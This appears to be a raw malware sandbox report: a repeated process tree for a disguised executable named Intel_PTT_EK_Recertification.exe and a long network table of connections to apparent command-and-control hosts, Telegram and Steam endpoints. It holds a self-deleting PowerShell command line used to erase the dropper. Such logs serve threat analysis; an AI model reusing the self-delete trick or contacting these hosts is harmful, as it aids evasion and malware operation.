C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BWCUpdater.exe
"C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BWCUpdater.exe" "{\"BWCU\":{\"fileName\":\"BWCUpdater.exe\",\"version\":\"2.0.1.4\",\"downloadURL\":\"https://download.microsoft.com/download/a/b/9/ab92b51f-92ea-4d46-9d21-9446bd20eed8/Update/BWCU/2.0.1.4/BWCUpdater.exe\",\"startApp\":\"BWApp\",\"forcelaunch\":\"0\",\"isMajorUpdate\":\"1\",\"BWCI\":{\"fileName\":\"BWCStartMSI.exe\",\"downloadURL\":\"https://download.microsoft.com/download/a/b/9/ab92b51f-92ea-4d46-9d21-9446bd20eed8/Update/BWCI/2.0.1.4/BWCStartMSI.exe\"},\"Components\":{\"BWApp\":{\"fileName\":\"BingWallpaperApp.exe\",\"version\":\"2.0.1.4\",\"downloadURL\":\"https://download.microsoft.com/download/a/b/9/ab92b51f-92ea-4d46-9d21-9446bd20eed8/Update/BWApp/2.0.1.4/BingWallpaperApp.exe\"},\"VSCM\":{\"fileName\":\"BingVisualSearchContextMenu.dll\",\"version\":\"1.0.7.8\",\"isMoveToTempRequired\":\"1\",\"optional\":\"IsVSEnabled\",\"downloadURL32\":\"https://go.microsoft.com/fwlink/?linkid=2142132\",\"downloadURL64\":\"https://go.microsoft.com/fwlink/?linkid=2142305\"},\"VSBL\":{\"fileName\":\"BingVisualSearchLauncher.exe\",\"version\":\"1.0.7.8\",\"optional\":\"IsVSEnabled\",\"downloadURL\":\"https://go.microsoft.com/fwlink/?linkid=2142207\"}}},\"hpwpdownloadAPI\":\"https://go.microsoft.com/fwlink/?linkid=2151983\",\"switch\":\"\",\"hbInterval\":\"1\",\"notifyAppInstall\":\"1\",\"notifyDailyRefresh\":\"1\",\"showNotificationAll\":\"1\",\"showImageNotification\":\"1\",\"showRecommendations\":\"1\",\"enableExtension\":\"1\",\"ShareSwitch\":\"1\",\"BNPSignal\":{\"ScanInterval\":\"12\",\"SendSignalOnChange\":1,\"ScheduledSignalInterval\":\"3\",\"SupportedBrowsers\":\"000\",\"APISwitch\":1},\"MEReset\":{\"Delay\":3,\"Type\":{\"NewUsers\":1,\"ExistingUsers\":1}}}"
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.66.49:443 | urlhaus.abuse.ch | tcp |
| NL | 85.31.47.154:80 | 85.31.47.154 | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| TH | 45.141.26.234:80 | 45.141.26.234 | tcp |
| FI | 37.27.43.98:443 | tcp | |
| AE | 62.60.226.24:80 | 62.60.226.24 | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| CN | 47.92.31.237:8088 | tcp | |
| TH | 45.141.26.234:7000 | tcp | |
| US | 8.8.8.8:53 | navegacionseguracol24vip.org | udp |
| CO | 181.131.217.244:30203 | navegacionseguracol24vip.org | tcp |
| FI | 37.27.43.98:443 | tcp | |
| CO | 181.131.217.244:30203 | navegacionseguracol24vip.org | tcp |
| HK | 47.238.103.180:54322 | 47.238.103.180 | tcp |
| RU | 185.81.68.147:443 | 185.81.68.147 | tcp |
| CO | 181.131.217.244:30203 | navegacionseguracol24vip.org | tcp |
| CN | 101.37.34.164:9000 | tcp | |
| RU | 185.81.68.147:1912 | tcp | |
| CO | 181.131.217.244:30203 | navegacionseguracol24vip.org | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| CO | 181.131.217.244:30203 | navegacionseguracol24vip.org | tcp |
| FI | 37.27.43.98:443 | tcp | |
| TH | 85.203.4.238:80 | 85.203.4.238 | tcp |
| RU | 176.122.27.90:9999 | 176.122.27.90 | tcp |
| CN | 101.37.34.164:9000 | tcp | |
| RU | 176.122.27.90:8888 | tcp | |
| FI | 37.27.43.98:443 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| FI | 37.27.43.98:443 | tcp | |
| US | 8.8.8.8:53 | download.emailorganizer.com | udp |
| NL | 190.2.142.115:80 | download.emailorganizer.com | tcp |
| US | 8.8.8.8:53 | bgteamtestapp.azurewebsites.net | udp |
| US | 52.173.134.115:80 | bgteamtestapp.azurewebsites.net | tcp |
| FI | 37.27.43.98:443 | tcp | |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.252.157:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 184.25.193.234:80 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | windriversfiles.imeitools.com | udp |
| US | 8.8.8.8:53 | g.ceipmsn.com | udp |
| US | 20.41.62.11:80 | g.ceipmsn.com | tcp |
| CN | 221.231.39.69:80 | windriversfiles.imeitools.com | tcp |
| US | 20.41.62.11:80 | g.ceipmsn.com | tcp |
| US | 148.163.102.170:4782 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 148.163.102.170:4782 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| IE | 185.166.142.23:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 3.5.28.45:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 148.163.102.170:4782 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| RU | 91.240.118.204:8000 | 91.240.118.204 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| CO | 181.131.217.244:30201 | navegacionseguracol24vip.org | tcp |
| RU | 94.198.55.181:4337 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| RU | 185.81.68.147:1912 | tcp | |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| FR | 82.64.156.123:80 | tcp | |
| RU | 185.81.68.147:1912 | tcp | |
| DE | 212.113.107.84:80 | 212.113.107.84 | tcp |
| US | 148.163.102.170:4782 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 8.8.8.8:53 | pentestfiles.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | pentestfiles.s3.amazonaws.com | udp |
| US | 52.217.226.129:80 | pentestfiles.s3.amazonaws.com | tcp |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| US | 148.163.102.170:4782 | tcp | |
| US | 8.8.8.8:53 | newstaticfreepoint24.ddns-ip.net | udp |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| US | 148.163.102.170:4782 | tcp | |
| US | 8.8.8.8:53 | status.mycompliancereports.com | udp |
| CA | 35.183.28.21:80 | status.mycompliancereports.com | tcp |
| RU | 185.215.113.36:80 | 185.215.113.36 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| N/A | 127.0.0.1:443 | tcp | |
| US | 8.8.8.8:53 | d2e5gvivzj4g90.cloudfront.net | udp |
| US | 148.163.102.170:4782 | tcp | |
| DE | 13.32.118.165:443 | d2e5gvivzj4g90.cloudfront.net | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 8.8.8.8:53 | home.sevjs17sr.top | udp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| US | 148.163.102.170:4782 | tcp | |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| FR | 82.64.156.123:80 | tcp | |
| RU | 31.41.244.12:80 | 31.41.244.12 | tcp |
| US | 148.163.102.170:4782 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| FR | 142.250.179.67:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| FR | 142.250.179.67:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| FR | 82.64.156.123:80 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 148.163.102.170:4782 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| FI | 37.27.43.98:443 | tcp | |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 2.22.144.142:80 | r11.o.lencr.org | tcp |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| US | 148.163.102.170:4782 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| RU | 185.81.68.147:1912 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | drive-connect.cyou | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 104.21.79.7:443 | drive-connect.cyou | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:443 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FI | 37.27.43.98:443 | tcp | |
| US | 8.8.8.8:53 | covery-mover.biz | udp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| FR | 82.64.156.123:80 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| DE | 104.86.41.223:443 | steamcommunity.com | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| RU | 185.81.68.147:1912 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| FI | 37.27.43.98:443 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:443 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FI | 37.27.43.98:443 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:443 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| FI | 37.27.43.98:443 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FI | 37.27.43.98:443 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:443 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| FR | 82.64.156.123:80 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:443 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:443 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
